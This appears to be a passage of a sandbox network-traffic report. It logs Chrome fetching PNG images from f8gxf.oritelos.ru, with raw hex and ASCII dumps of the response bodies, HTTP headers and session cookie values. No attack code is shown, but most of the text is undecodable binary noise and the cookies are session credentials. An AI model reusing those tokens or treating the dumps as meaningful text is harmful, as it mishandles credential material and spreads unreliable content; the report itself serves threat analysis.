                                                2024-05-30 10:21:16 UTC1369INData Raw: 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32 d8 84 d4 70 77 54 74 10 49 92 3a 60 55 e0 17 c0 ff c3 ef fb 25 49 92 24 a9 6b f5 d7 c0 51 c5 a7 dc 6e 06 26 47 87 50 5b ce 24 ed 01 5b 47 d3 81 77 01 ff 88 0e 22 e9 ff 5c 13 1d a0 45 55 6c b2 54 f9 f5 90 56 c0 ba 99 d4 28 24 95 c9 10 e0 5c e0 c7 c0 b0 e0 2c 92 24 75 c2 fb 80 07 80 43 a2 83 48 92 24 49 92 3a af 2e 2b 70 b8 fa 46 b5 bd 9d fa 3e ed 3b 07 f8 4f e0 96 e8 20 92 16 f0
                                                Data Ascii: OTvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2pwTtI:`U%I$kQn&GP[$[Gw"\EUlTV($\,$uCH$I:.+pF>;O
                                                2024-05-30 10:21:16 UTC1369INData Raw: f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0 81 8d b7 ab e6 4e d4 01 55 7b 5a ba db ac 08 7c 2d 3a 44 66 8f 02 9f 8a 0e 21 a9 10 55 bc a7 ac 46 f5 1a 4f 94 cf 36 c0 2f e9 bf 43 57 52 ff d6 06 7e 4e fa 01 69 56 70 16 49 92 3a 69 20 f0 33 52 03 f0 9f 83 b3 48 92 24 49 52 94 cb 80 c7 fb f9 fd ad 81 8d fb fc fa 71 e0 9e 7e fe de 5d 4d fc 5f cb 93 9a 38 be dd cf 9f 1d b5 b8 0f 9c d7 c0 d1 ee 72 21 9d f6 3c 30 31 3a 84 16 eb 2b
                                                Data Ascii: ?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-VNU{Z|-:Df!UFO6/CWR~NiVpI:i 3RH$IRq~]M_8r!<01:+
                                                2024-05-30 10:21:16 UTC1369INData Raw: 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28 fe b4 d0 bf 7d 57 3f 7f e7 e5 be 7f a7 97 ea 2d c1 3e 31 3a 80 16 70 06 d0 1b 1d 22 93 df 90 9e ce 95 5a b5 07 a9 c9 ec 24 96 3c 61 f8 01 e0 16 60 95 a2 43 69 a9 55 f1 fe 52 b5 55 b4 b4 74 be 0a 6c 17 1d a2 a2 26 01 e7 02 9b 03 bb 90 9a e5 ea be 4a cd 4c e0 2a 60 7f d2 53 cb 5f 04 1e 09 4d 54 6d 5f 25 4d 18 4a 92 e2 bd 00 dc 0c 7c 9b b4 ad dc ba a4 e6 82 0f 00 97 52 bd 15 f4 aa
                                                Data Ascii: w/lv="z|?;8=qzRR%kFuLAHO}|^|h$I4LZ/Iuy:6Hr^/}ME(}W?->1:p"Z$<a`CiURUtl&JL*`S_MTm_%MJ|R
                                                2024-05-30 10:21:16 UTC79INData Raw: a1 3e ab 6f 7c 9d b4 6c aa b4 b0 bd 48 13 58 5f 06 86 04 65 58 1f 57 e1 88 54 b5 c9 e2 aa 35 61 6a 41 67 e1 b6 49 0b bb 11 d8 06 b8 3d 3a 48 97 9a 0c 1c 0c 7c 0e 98 19 9c a5 4c 36 07 f6 8b 0e 21 49 2a cc 44 e0 e3 c0 bb 80 e7 83 b3 94 d9
                                                Data Ascii: >o|lHX_eXWT5ajAgI=:H|L6!I*D


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                65192.168.2.449816188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:15 UTC1140OUTGET /opoOaMVrzIDE0P1lipe1zMT613jRjCFVKN9uJkQa0A8xgdP12cMBgwt0cXabOuYMflHSHmdef235 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28iLCJtYWMiOiI2YmI1OWU4YzUxN2VmYzA2ZDhkODk3MGU3ZTQzZjJkMmY5MDc4Yjg4ZGVjZjBmODM2NmVkYTJkODE4ODM1ZDA3IiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:16 UTC668INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:16 GMT
                                                Content-Type: image/png
                                                Content-Length: 29796
                                                Connection: close
                                                Content-Disposition: inline; filename="opoOaMVrzIDE0P1lipe1zMT613jRjCFVKN9uJkQa0A8xgdP12cMBgwt0cXabOuYMflHSHmdef235"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WQFt4yItPsRDjoPMIKn25vAWWn0xXD%2BbUxBm1eKaA3kWbcw1vMyLL9h7szj2QJewLHEmaWJ1YPvzRUGix7J3ilDaUF%2FKuhkzoClnGK4xcjqi8IY1QbfUarRaAAmXmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdff0f1b2a43e7-EWR
                                                2024-05-30 10:21:16 UTC701INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fa 00 00 01 2f 08 06 00 00 00 ad e6 03 d5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec 5d 07 58 53 49 17 3d 88 20 4d b0 80 14 11 54 b0 60 03 b1 8b 58 10 c5 de c5 82 bd ae 7d 7f 5d fb ae 7d ed ab ae ae ae 65 d7 ae 6b ef 1d 7b af 28 2a 56 ec a2 a0 82 82 60 a1 f8 fe 6f 26 10 13 29 69 2f c9 cb cb cc f7 c5 48 32 73 e7 de 73 ef 9b 93 79 6f e6 8e 09 58 61 08 30 04 18 02 0c 01 86 00 43 40 b4 08 98 88 d6 32 66 18 43 80 21 c0 10 60 08 30 04 18 02 60 44 cf 82 80 21 c0 10 60 08 30 04 18 02 22 46 80 11 bd 88 9d cb 4c 63 08 30 04 18 02 0c 01 86 00 23 7a 03 8b 81 b0 1b e1 dc a1 83 07 10 15 15 85 d7 af 5e e1 d5 ab 57 f8 f6 ed 1b 0a 17 76 45 61 d7 c2 28 52 c4 0d d5 ab 57 87 6f a5 4a c8 6b
                                                Data Ascii: PNGIHDR/sRGB IDATx^]XSI= MT`X}]}ek{(*V`o&)i/H2ssyoXa0C@2fC!`0`D!`0"FLc0#z^WvEa(RWoJk
                                                2024-05-30 10:21:16 UTC1369INData Raw: 3e 45 fc 87 0f 39 ca cf 97 2f 3f 8a 16 2b 86 62 c5 8a a1 48 91 22 70 2d 52 04 4e 85 1c 58 ec 68 ec 15 26 80 21 c0 10 60 08 68 1f 01 36 58 f3 80 f1 b0 9f 7f e6 8e 86 86 f2 20 e9 bb 08 33 33 73 0c 1d 3b 59 a9 e7 f1 39 75 1c 11 1e 86 63 07 77 23 ee dd 5b 5e f5 73 75 75 85 9b bb 3b 25 fe 0a de de a8 57 2f 00 76 79 6d 58 3c f1 8a 32 13 c6 10 60 08 30 04 34 47 80 0d cc 1a 62 78 f7 fe 03 ae 43 fb 76 72 2b dc 35 14 49 9b 07 b5 68 87 1a b5 03 d4 12 95 92 9c 8c f0 b0 cb 38 7f 22 14 71 b1 fc 12 7c 76 0a 11 e2 af 5b 2f 00 f5 ea d5 43 f5 6a 55 59 5c a9 e5 39 d6 88 21 c0 10 60 08 f0 8f 00 1b 90 35 c4 74 c9 df 4b b9 c5 7f 2d a2 52 1a 34 68 88 05 0b e6 ab 85 69 f8 cd 5b 5c e7 4e 1d a9 9c 3c 79 2c 30 6a ca 6c 95 9f cb 47 bf 7a 89 db 37 ae e1 c6 95 0b 48 fc 98 90 a5 65 e6
                                                Data Ascii: >E9/?+bH"p-RNXh&!`h6X 33s;Y9ucw#[^suu;%W/vymX<2`04GbxCvr+5Ih8"q|v[/CjUY\9!`5tK-R4hi[\N<y,0jlGz7He
                                                2024-05-30 10:21:16 UTC1369INData Raw: 9c 2c 17 dc a1 23 26 4e f8 4d 63 1c 97 2e 5b c6 2d 5a b8 90 ca ac 59 27 10 0d 9b b7 c1 97 2f 5f b0 7c fe 0c b9 a4 37 e4 73 f2 bd 21 97 07 77 6e 61 d7 e6 75 72 cf ee 27 4e 9a 84 60 0d ef 8a 30 a2 37 e4 a8 60 ba f3 81 00 23 7a 3e 50 14 9f 0c 8d 09 4a 7c 90 e4 6c d1 87 84 04 2e b8 5d 7b 44 45 49 16 ce ad f8 f7 5f d4 ac 5e 5d 63 1c 65 ef 12 90 63 68 eb 37 6d 85 3d 9b d7 49 67 be a4 af 36 9d 7b a0 82 6f 55 51 40 4e f6 df ef da bc 56 2e 35 ef 88 5f 46 a2 57 cf 1e 6a 63 c9 88 5e 14 a1 c1 8c d0 00 01 46 f4 1a 80 27 e2 a6 6a 0f aa 22 c6 24 47 d3 76 ec da c5 fd 36 7e 3c ad 43 72 bc ff b7 71 23 2f 18 7e 4c fa c4 05 b7 6b 87 e7 cf b3 4e f0 d2 ad ff 30 14 2f 51 4a 54 b0 bf 89 7e 85 5d 9b d6 e2 d5 cb e7 52 bb 7e 1a 30 00 43 06 0f 56 0b 53 46 f4 a2 0a 0f 66 8c 1a 08 30
                                                Data Ascii: ,#&NMc.[-ZY'/_|7s!wnaur'N`07`#z>PJ|l.]{DEI_^]cech7m=Ig6{oUQ@NV.5_FWjc^F'j"$Gv6~<Crq#/~LkN0/QJT~]R~0CVSFf0
                                                2024-05-30 10:21:16 UTC1369INData Raw: 92 e8 df e5 0b 14 c0 af be 15 51 cd b1 90 b4 ce da 07 0f 31 e1 8a e4 ee 0f 29 25 ed ec f0 6b 25 5f d4 76 76 92 7e b6 f2 de 7d 4c b9 16 26 fd db df d9 09 fe 4e 4e 70 b0 b4 14 dc a5 15 fb e5 0b 8e 45 bd c2 85 98 18 c1 e9 66 2c 0a 31 a2 37 16 4f 6b cf 4e b5 06 54 ed a9 23 2c c9 b1 ef 3f d0 45 78 b1 b1 b1 54 b1 35 6b d7 a1 72 25 5f 8d 31 cb 6a 36 1f 79 ef 0e ce 1c 3b 48 fb a9 1b d4 0c 7e 75 1b 08 0b 0c 9e b5 89 79 fd 8a ce e2 6f 86 5d 96 93 3c 6a f4 18 74 ef d6 55 2d 8c f9 24 fa 62 79 f3 e2 44 8b 66 99 ac 0e da 7f 00 f7 3f c4 d3 cf 03 0a bb 60 65 dd 3a 72 75 e2 be 7e 85 ef 36 c9 e2 4a 52 c8 6c 7e 4d bd ba 99 e4 14 dd f0 9f f4 b3 21 e5 ca 62 84 77 05 9e 11 e6 4f 5c e8 cb 28 f4 3d 25 39 42 99 15 dd 23 c0 88 5e f7 98 8b ad 47 b5 06 54 b1 81 90 9d 3d b2 b9 e7 2b
                                                Data Ascii: Q1)%k%_vv~}L&NNpEf,17OkNT#,?ExT5kr%_1j6y;H~uyo]<jtU-$byDf?`e:ru~6JRl~M!bwO\(=%9B#^GT=+
                                                2024-05-30 10:21:16 UTC1369INData Raw: 23 b8 4e e9 ab f8 89 6c 5b bb 7c 68 d2 ba 03 4a 97 f3 96 53 e0 e1 dd db d8 b7 7d 13 e2 3f c4 a1 aa 5f 1d d4 6f d2 12 79 f2 e4 4c 94 fa f2 61 c2 87 f7 94 e0 2f 9f 3b 25 a7 42 ed 6a ae e8 d5 a1 1c 7c cb 4b d6 1f 28 53 4c 5d 46 69 8c 33 23 7a 65 90 66 75 0c 0d 01 46 f4 86 e6 31 e1 e9 ab f1 e0 2a 3c 93 34 d3 28 b8 43 07 2e e2 f6 6d 2a 64 f6 9c b9 68 da a4 31 2f 18 ed 3b 70 80 1b 3d 72 24 95 6b 97 af 00 06 8f 9e 00 33 33 c9 82 34 52 c8 ed ee fd db ff c3 bd 88 9b 70 72 71 45 ab 8e dd e8 bb 50 cb 95 f3 a7 41 56 d4 7f 88 93 64 0d 24 85 2c b6 1b da cb 97 92 bc aa e5 ab 6d 67 58 d9 b8 6a 84 35 23 7a 55 51 67 f5 0d 01 01 46 f4 86 e0 25 61 eb a8 d1 c0 2a 6c d3 54 d7 ee ec f9 f3 5c ff be 7d 69 43 37 37 37 1c 3c 78 90 37 7c d6 ac 5b c7 cd 9e 39 93 ca 2e 5f b1 0a da 86
                                                Data Ascii: #Nl[|hJS}?_oyLa/;%Bj|K(SL]Fi3#zefuF1*<4(C.m*dh1/;p=r$k334RprqEPAVd$,mgXj5#zUQgF%a*lT\}iC777<x7|[9._
                                                2024-05-30 10:21:16 UTC1369INData Raw: 5e 33 73 e4 ce 65 02 8e 03 d2 38 0e 09 c9 c9 88 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b a3 d7 f9 b5 59 a3 81 95 5f 55 f4 23 ed c0 c1 43 dc c8 5f 46 d0 ce bd 7d 7c b0 71 c3 06 ad 60 22 7b eb be a8 47 09 3c 7d f4 10 ae 6e 45 d1 ac 5d e7 4c 89 71 48 32 1a 72 9b fe cb 97 cf 08 6c da 0a b5 ea 35 94 03 87 1c 1c 43 d2 e3 92 ef 34 c9 9a 77 eb fa 15 7a 9b 9e 6c ef cb 28 24 5d 2d 21 78 b2 a0 4e 95 72 e4 f4 53 fc 32 55 92 21 cf b7 9c 23 56 cf 6f a4 4a 73 a4 58 d5 86 45 be ea 1a 61 cf 88 5e 25 c8 d5 aa ec 69 67 0b ef 82 05 e1 95 2f 1f 4a d8 d9 c1 c3 ce 16 2e 56 56 c8 65 92 b5 eb 52 39 0e af 92 92 f0 28 21 01 0f e3 13 70 f7 fd 7b 84 c7 c6 e1 71 fa 09 8e 6a 29 61 64 8d 18 d1 1b 99 c3 b5 60 ae 46 03 ab 16 f4 d1 b9 c8 a1 c3 86 71 c7 8e 1e a5 fd 8e 18 39 12 bd 7a f4 d0
                                                Data Ascii: ^3se8ONFeY_U#C_F}|q`"{G<}nE]LqH2rl5C4wzl($]-!xNrS2U!#VoJsXEa^%ig/J.VVeR9(!p{qj)ad`Fq9z
                                                2024-05-30 10:21:16 UTC1369INData Raw: 1e b6 3d fe fe b8 49 3d 0b 0d bb 15 23 7a c3 f6 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3 f9 ab 92 0c 7a 65 4b 16 c4 da 3f 9b c0 2c 77 2e 95 64 a7 99 97 82 b9 7d 4b 5e b0 67 44 af 12 f4 74 cf fb 80 32 65 30 a0 6c 19 8d 57 d2 ab d6 b3 f2 b5 c9 b3 fb bf 23 ee 60 c5 dd 7b ca 37 12 59 4d 46 f4 22 73 a8 1e cc e1 65 80 d5 83 de 1a 75 f9 df a6 cd dc b4 a9 53 a8 8c 7a f5 02 f0 d7 5f 8b 74 82 43 fd c0 40 2e fa f5 6b da 6f df 61 a3 51 b8 88 3b e2
                                                Data Ascii: =I=#zxp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dwzeK?,w.d}K^gDt2e0lW#`{7YMF"seuSz_tC@.koaQ;
                                                2024-05-30 10:21:16 UTC1369INData Raw: a6 a8 5e 3b 00 b9 72 c9 6f 4f 23 5b e5 c8 6a fa d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38 eb c5 fe b9 7f fc c1 ad 5a b9 92 ea 62 63 6b 87 fe 3f 8f a1 09 72 64 0b 49 76 43 9e c3 df 8f b8 29 f7 39 59 57 d0 ad 5b 77 38 98 1e 43 ae 54 c3 7a 4e c9 99 58 22 d9 ae 0b ac ac f2 6b 05 77 46 f4 59 5f 5d 2e d6 56 f8 d3 af 26 aa 38 f0 7b e7 e7 65 f4 5b 5c bb fd 00 29 a9 69 d9 5e d6 c5 5c 9d e0 5b b6 24 34 38 4a 21 5b d9 c7 a3 5e e1 e7 f3 e7 91 90 fc
                                                Data Ascii: ^;roO#[jctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8Zbck?rdIvC)9YW[w8CTzNX"kwFY_].V&8{e[\)i^\[$48J![^
                                                2024-05-30 10:21:16 UTC1369INData Raw: 18 2e 6a 7b b3 c3 33 e9 f3 67 ce 34 f9 1e 4c 93 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95 f2 82 66 d5 33 49 7b 83 5c a9 af 15 37 35 31 05 97 2b 3f be e5 76 c2 b7 dc ce f8 96 bb 08 ac ac ed 05 87 25 23 fa ef ae 0c f6 28 8e d9 d5 ab 29 f6 ad 1a 35 ce 85 45 e0 f5 1b d5 b7 73 b6 ac 5f 13 66 66 b9 d5 e8 51 b9 26 7d 4f 9d 41 e8 cb 97 ca 55 36 a0 5a 8c e8 0d c8 59 02 55 55 70 83 35 5f 38 6d dd be 9d 9b 34 61 02 15 e7 e7 57 0b cb 97 2f 13 ad ad
                                                Data Ascii: .j{3g4L"WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)f3I{\751+?v%#()5Es_ffQ&}OAU6ZYUUp5_8m4aW/
                                                2024-05-30 10:21:16 UTC1369INData Raw: 93 bf e2 f1 83 7b 08 bb 7c 1e 0f ee dc 92 d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13 ec 94 d9 1b af ad 08 28 e3 e9 0e f2 52 a7 90 8c 78 24 33 9e 18 0b 23 7a 31 7a 55 b7 36 09 9e fc 36 6d d9 c2 4d 9d 3c 99 a2 62 6a 6a 8a 3e 43 46 c2 d9 d5 4d 21 4a 61 97 ce 61 cf d6 0d d2 7a 5b b6 6e 43 d9 32 5e 82 b7 57 a1 61 ac 42 b6 08 30 a2 97 87 c6 3d af 0d 36 05 d6 87 b3 95 f2 e9 67 95 c9 76 a7 ad 10 54 37 b9 4e 64 7c 02 3a 1e 3d 86 77 59 3c be
                                                Data Ascii: {|FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F(Rx$3#z1zU66mM<bjj>CFM!Jaaz[nC2^WaB0=6gvT7Nd|:=wY<


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                66192.168.2.449817188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:16 UTC1118OUTGET /uvqJ1vttlOtyse1uiNXANyDnlVmnMePabfpUCdRdsK7hMtqc7ef260 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28iLCJtYWMiOiI2YmI1OWU4YzUxN2VmYzA2ZDhkODk3MGU3ZTQzZjJkMmY5MDc4Yjg4ZGVjZjBmODM2NmVkYTJkODE4ODM1ZDA3IiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:16 UTC650INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:16 GMT
                                                Content-Type: image/png
                                                Content-Length: 70712
                                                Connection: close
                                                Content-Disposition: inline; filename="uvqJ1vttlOtyse1uiNXANyDnlVmnMePabfpUCdRdsK7hMtqc7ef260"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MoiSxzuww3vBWA14pxdaZRJmYA6faUxkXVbkS%2BCDvfvaNQNXJooN93SdQDTHpg0%2BmZp8f1%2B0jrwD15J9U1My48N1T9tY%2FXnsvCiFODAGhtnL2wxsIjGK2BQHa4ihAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdff0f9840b9c5-EWR
                                                2024-05-30 10:21:16 UTC719INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:16 UTC1369INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:16 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 